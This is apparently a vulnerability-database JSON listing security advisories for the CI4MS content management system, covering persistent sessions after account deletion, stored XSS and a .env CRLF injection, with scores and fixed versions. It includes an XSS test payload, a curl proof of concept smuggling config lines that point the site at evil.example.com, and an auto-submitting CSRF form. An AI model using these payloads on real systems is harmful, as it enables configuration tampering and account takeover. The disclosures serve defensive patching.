including administrative and content interfaces\n\n### Attack Scenario\n- A user logs into the application.\n- An administrator **deletes** the user account.\n- The user remains fully logged in and can continue performing all actions allowed by their role indefinitely, as there is no session expiration.\n- The user can continue invoking backend methods, triggering application actions, accessing sensitive interfaces (including user management if permitted), and interacting with the system as if the account were still active.\n- Access is only lost if the user manually logs out, which may never occur.\n\n### Impact\n- **Unauthorized Continued Access:** Deleted users retain full access indefinitely, violating intended access control and expected security behavior.\n- **Bypass of Administrative Controls:** Administrative actions (**deletion**) fail to immediately restrict active sessions.\n- **Logic Flaw Resulting in Broken Behavior:** Backend authorization logic relies on a flawed trust assumption that authenticated users remain valid, enforcing account state only at login.\n- **Full Functional Access Retained:** Deleted users can continue invoking application methods, executing actions, interacting with protected endpoints, and using the system exactly as before deletion.\n- **Privilege Abuse:** Users with elevated roles (moderator, editor, administrator) can continue performing privileged actions after account deletion, including accessing user management interfaces and modifying application state.\n- **Service Disruption Potential:** Persistent access allows attackers to disrupt services, manipulate content, or interfere with normal application operations.\n- **Attack Persistence:** Attackers can maintain access indefinitely, increasing the risk of data exfiltration, unauthorized modifications, or further privilege escalation.\n- **False Sense of Remediation:** Administrators may believe a threat has been mitigated while the deleted user remains active within the system.\n\n**Endpoint Example:** Any endpoint accessible to authenticated users, including dashboards, administrative interfaces, user management pages, and API endpoints.\n\n## Steps To Reproduce (PoC)\n1. Create or use an existing user account.\n2. Log into the application using this account.\n3. From an administrative account, **delete** the logged-in user account.\n4. Observe that the target user remains authenticated.\n5. Verify that the user can still access protected functionality, invoke actions, and interact with the application as before.\n6. Confirm that the user only loses access after manually logging out (if they choose to do so).\n\n## Remediation\n- Immediately invalidate all active sessions when an account is **deleted**.\n- Enforce account status checks on every authenticated request, not only during login.\n- Introduce proper session expiration or account expiration mechanisms to prevent indefinite access.\n- Correct the backend logic flaw to ensure access control behavior aligns with intended security design and does not rely on unsafe trust assumptions.\n\n# Ready Video POC:\nhttps://mega.nz/file/7dlUTQAB#0oXOapF5XYN4DRRG1xYj6DajmuP72MpMdsHqbVBMmWw",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34570",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10879",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10843",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10889",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12843",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34570"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-03T16:40:59Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-4vxv-4xq4-p84h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-03T16:40:59Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-4vxv-4xq4-p84h"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34570",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34570"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4vxv-4xq4-p84h",
                    "reference_id": "GHSA-4vxv-4xq4-p84h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4vxv-4xq4-p84h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34570",
                "GHSA-4vxv-4xq4-p84h"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tje9-d65v-bbd4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89858?format=api",
            "vulnerability_id": "VCID-ux28-acyz-kqd1",
            "summary": "CI4MS: Backup Management Full Account Takeover for All Roles & Privilege Escalation via Stored DOM Blind XSS\nAn attacker can achieve Full Account Takeover and Privilege Escalation via Stored DOM XSS in the backup module's filename field, which is manipulated through an SQL file that tampers with the filename field to contain a hidden XSS payload.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41201",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00057",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18273",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00057",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18239",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00057",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18277",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00063",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19614",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41201"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T14:07:25Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-qxpq-82f3-xj47",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T14:07:25Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-qxpq-82f3-xj47"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41201",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41201"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qxpq-82f3-xj47",
                    "reference_id": "GHSA-qxpq-82f3-xj47",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qxpq-82f3-xj47"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1126288?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1041566?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110106?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-41201",
                "GHSA-qxpq-82f3-xj47"
            ],
            "risk_score": 4.1,
            "exploitability": "0.5",
            "weighted_severity": "8.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ux28-acyz-kqd1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89291?format=api",
            "vulnerability_id": "VCID-vjxw-3q1u-f3az",
            "summary": "CI4MS: Menu Management (Posts) Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Posts Added to Menu (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsafe Rendering of Post Entries in Menu Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when **adding Posts to navigation menus** through the Menu Management functionality. Post-related data selected via the Posts section is stored server-side and rendered without proper output encoding.\n\nThese stored values are later rendered unsafely within administrative dashboards and public-facing navigation menus, resulting in stored DOM-based cross-site scripting (XSS).\n\n### Affected Functionality\n- Menu Management – Posts section\n- Adding posts to navigation menus\n- Menu storage and rendering logic\n\n### Attack Scenario\n- An attacker creates or controls a post containing a malicious JavaScript payload.\n- The attacker adds the post to the menu using the **Posts** functionality in Menu Manager.\n- The application stores the menu entry without sanitization or encoding.\n- The payload persists and executes whenever the menu is rendered.\n\n### Impact\n- Persistent Stored DOM XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation in administrative contexts\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application via global navigation execution\n\nEndpoint:\n- `/backend/menu/`\n\n## Steps To Reproduce (POC)\n1. Navigate to Menu Management\n2. Use the **Posts** section to add a post containing an XSS payload such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the menu\n4. View the menu in the administrative panel or any public-facing page\n5. Observe the JavaScript payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/PcMiUA5K#L2RlZJa340Q8K42TksxiXMuo_9XsRYPi14-WvBnak2A",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34565",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15923",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15872",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15912",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18292",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34565"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T18:08:32Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xgh5-w62m-8mpr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T18:08:32Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xgh5-w62m-8mpr"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34565",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34565"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xgh5-w62m-8mpr",
                    "reference_id": "GHSA-xgh5-w62m-8mpr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xgh5-w62m-8mpr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34565",
                "GHSA-xgh5-w62m-8mpr"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vjxw-3q1u-f3az"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89210?format=api",
            "vulnerability_id": "VCID-w12h-33nr-bufh",
            "summary": "CI4MS Vulnerable to .env CRLF Injection via Unvalidated `host` Parameter in Install Controller\n## Summary\n\nThe `Install::index()` controller reads the `host` POST parameter without any validation and passes it directly into `updateEnvSettings()`, which writes it into the `.env` file via `preg_replace()`. Because newline characters in the value are not stripped, an attacker can inject arbitrary configuration directives into the `.env` file. The install routes have CSRF protection explicitly disabled, and the `InstallFilter` can be bypassed when `cache('settings')` is empty (cache expiry or fresh deployment).\n\n## Details\n\nIn `modules/Install/Controllers/Install.php`, the `$valData` array (lines 13-27) defines validation rules for all POST parameters **except** `host`. The `host` value is read at line 35:\n\n```php\n// line 32-41\n$updates = [\n    'CI_ENVIRONMENT' => 'development',\n    'app.baseURL' => '\\'' . $this->request->getPost('baseUrl') . '\\'',\n    'database.default.hostname' => $this->request->getPost('host'),  // NO VALIDATION\n    'database.default.database' => $this->request->getPost('dbname'),\n    // ...\n];\n```\n\nThis value is passed to `updateEnvSettings()` (lines 89-101), which uses `preg_replace` with the raw value as the replacement string:\n\n```php\n// line 94-98\nforeach ($updates as $key => $value) {\n    $pattern = '/^' . preg_quote($key, '/') . '=.*/m';\n    $replacement = \"{$key}={$value}\";\n    if (preg_match($pattern, $contents)) $contents = preg_replace($pattern, $replacement, $contents);\n    else $contents .= PHP_EOL . $replacement;\n}\n```\n\nSince the `env` template has all lines commented out (e.g., `# database.default.hostname = localhost`), the pattern does not match, and the value is appended verbatim — including any embedded newline characters. This allows injection of arbitrary key=value pairs into `.env`.\n\nThe `dbpassword` field (line 17) is a secondary vector — its validation (`permit_empty|max_length[255]`) does not reject newline characters.\n\n**Access conditions:**\n- CSRF is explicitly disabled for install routes (`InstallConfig.php:7-9`), confirmed consumed by `Filters.php:220-231,246-251`.\n- `InstallFilter` (line 13) only blocks when **both** `.env` exists **and** `cache('settings')` is populated. The endpoint is accessible during fresh install or after cache expiry/clear.\n\n**Mitigation note:** `encryption.key` injection is NOT exploitable because `generateEncryptionKey()` (line 70) runs after `updateEnvSettings()` and overwrites all `encryption.key=` lines with a cryptographically random value. However, all other `.env` settings remain injectable.\n\n## PoC\n\n**Scenario:** Application is deployed but cache has expired (or fresh install window).\n\n```bash\n# Inject app.baseURL override and disable secure requests via host parameter\n# The %0a represents a newline that creates new .env lines\ncurl -X POST 'http://target/install/' \\\n  -d 'baseUrl=http://target/&dbname=ci4ms&dbusername=root&dbpassword=&dbdriver=MySQLi&dbpre=ci4ms_&dbport=3306&name=Admin&surname=User&username=admin&password=Password123&email=admin@example.com&siteName=TestSite&host=localhost%0aapp.baseURL=http://evil.example.com/%0aapp.forceGlobalSecureRequests=false%0asession.driver=CodeIgniter\\Session\\Handlers\\DatabaseHandler'\n```\n\n**Expected result:** The `.env` file will contain:\n\n```\ndatabase.default.hostname=localhost\napp.baseURL=http://evil.example.com/\napp.forceGlobalSecureRequests=false\nsession.driver=CodeIgniter\\Session\\Handlers\\DatabaseHandler\n```\n\nThese injected lines override the legitimate `app.baseURL` set earlier (CI4's DotEnv processes top-to-bottom; later values win for `putenv`), redirect the application base URL to an attacker-controlled domain, and modify session handling.\n\n**CSRF exploitation variant** (no direct access needed):\n\n```html\n<!-- Hosted on attacker site, victim admin visits while cache is empty -->\n<form id=\"f\" method=\"POST\" action=\"http://target/install/\">\n  <input name=\"baseUrl\" value=\"http://target/\">\n  <input name=\"host\" value=\"localhost&#10;app.baseURL='http://evil.example.com/'\">\n  <!-- ... other required fields ... -->\n</form>\n<script>document.getElementById('f').submit();</script>\n```\n\n## Impact\n\nAn unauthenticated attacker can inject arbitrary configuration into the `.env` file when the install endpoint is accessible (fresh deployment or cache expiry). This enables:\n\n- **Application URL hijacking** — injecting `app.baseURL` to an attacker domain, causing password reset links, redirects, and asset loading to point to attacker infrastructure\n- **Security downgrade** — disabling `forceGlobalSecureRequests`, CSP, or other security settings\n- **Session manipulation** — changing session driver or save path configuration\n- **Full application reconfiguration** — the `copyEnvFile()` method overwrites the existing `.env` with the template before applying updates, destroying the current configuration (denial of service)\n- **Database redirect** — while not via the `host` injection itself (the host value is a legitimate DB config), injecting additional database config lines can alter connection behavior\n\nThe attack is amplified by the absence of CSRF protection on the install endpoint, allowing exploitation via a malicious webpage visited by anyone on the same network.\n\n## Recommended Fix\n\n1. **Add validation for the `host` parameter** — reject newlines and restrict to valid hostnames/IPs:\n\n```php\n// In $valData, add:\n'host' => ['label' => lang('Install.databaseHost'), 'rules' => 'required|max_length[255]|regex_match[/^[a-zA-Z0-9._-]+$/]'],\n```\n\n2. **Sanitize all values in `updateEnvSettings()`** — strip newlines from replacement strings:\n\n```php\nprivate function updateEnvSettings(array $updates)\n{\n    $envPath = ROOTPATH . '.env';\n    if (!file_exists($envPath)) return ['error' => \"'.env' file not found.\"];\n    $contents = file_get_contents($envPath);\n    foreach ($updates as $key => $value) {\n        $value = str_replace([\"\\r\", \"\\n\"], '', (string) $value);  // Strip CRLF\n        $pattern = '/^' . preg_quote($key, '/') . '=.*/m';\n        $replacement = \"{$key}={$value}\";\n        if (preg_match($pattern, $contents)) $contents = preg_replace($pattern, $replacement, $contents);\n        else $contents .= PHP_EOL . $replacement;\n    }\n    file_put_contents($envPath, $contents);\n    return true;\n}\n```\n\n3. **Add newline validation to `dbpassword`** — add `regex_match[/^[^\\r\\n]*$/]` to the validation rules.\n\n4. **Strengthen `InstallFilter`** — consider checking for a more reliable installation-complete indicator than cache state (e.g., a database table existence check or a dedicated lock file).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39394",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09845",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09755",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09838",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00032",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09864",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39394"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
